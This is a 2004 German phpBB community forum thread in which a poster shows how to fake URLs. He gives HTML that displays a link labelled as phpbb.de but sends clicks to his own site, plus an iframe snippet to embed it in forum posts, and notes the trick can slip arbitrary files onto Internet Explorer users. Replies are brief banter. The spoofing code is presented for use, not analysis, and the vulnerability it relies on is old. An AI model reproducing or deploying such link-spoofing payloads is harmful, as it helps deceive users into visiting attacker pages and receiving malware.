phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

URLs fälschen

https://www.phpbb.de/community/viewtopic.php?t=54421

Seite 1 von 1

URLs fälschen

Verfasst: 11.05.2004 16:42
von Burkhard
URLs fälschen geht so: Man erstellt eine Website mit beliebigem Titel mit einem Code ungefähr so (in diesem Beispiel http://www.burks.de/test3.html ):

Code: Alles auswählen

<html><head><title>test</title><meta name="author" content="egal"></head><body text="#000000" bgcolor="#FFFFFF" link="#FF0000" alink="#FF0000" vlink="#FF0000">
<A href="http://www.phpbb.de"><FORM action=http://www.burks.de method=get><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" type=submit value=http://www.phpbb.de></A></body></html>
Im Forum postet man z.B. (HTML muss erlaubt sein):

Code: Alles auswählen

<table border=2><tr><td rowspan=2><iframe src="http://www.burks.de/test3.html" name="framename" width="400" height="400">irgendein Text</iframe></td></tr></table>
Wer auf den vermeintlichen URL www.phpbb.de klickt, kommt auf meine Seite. Hintergrund ist eine Sicherheitslücke, die hier http://www.heise.de/security/news/meldung/46200 beschrieben wird. Man nennt das URL-Spoofing.
Ist dieser Code in einem HTML-Dokument eingebettet, so zeigen Internet Explorer und Outlook Express einen Link auf www.microsoft.com an. Bewegt man den Mauszeiger über den Hyperlink, so zeigt auch die Statusleiste www.microsoft.com an, obwohl der Link eigentlich auf www.malware.com/t-bill.html führt.
Funktionierendes Beispiel: http://www.burks.de/forum/phpBB2/viewtopic.php?p=15414
Mit der Methode kann man jedem IExplorer-DAU beliebige Dateien unterjubeln.
Für pures HTML gilt:
Die harmlose Demo ...führt zunächst auf die Seite www.malware.com, die sofort wieder auf www.microsoft.com umleitet, sodass der Benutzer kaum merkt, dass etwas nicht stimmt. Allein der kurze Aufruf genügt aber, um auf C: die Datei malware.exe zu schreiben.
Burks

itst: ich hab mal aus p_ornos phpbb gemacht ;)

Verfasst: 11.05.2004 17:14
von SoulReaver1989
Du hättest ned unbedingt die Seite verlinken müssen :o

Re: URLs fälschen

Verfasst: 20.12.2007 23:55
von kolja
itst: ich hab mal aus p_ornos phpbb gemacht ;)
heisst das nicht pornos ?

Verfasst: 21.12.2007 00:04
von gn#36
Leichenfledderer! :evil: Das Thema hat schon fast Antikwert. :roll:
Alle Zeiten sind UTC+02:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de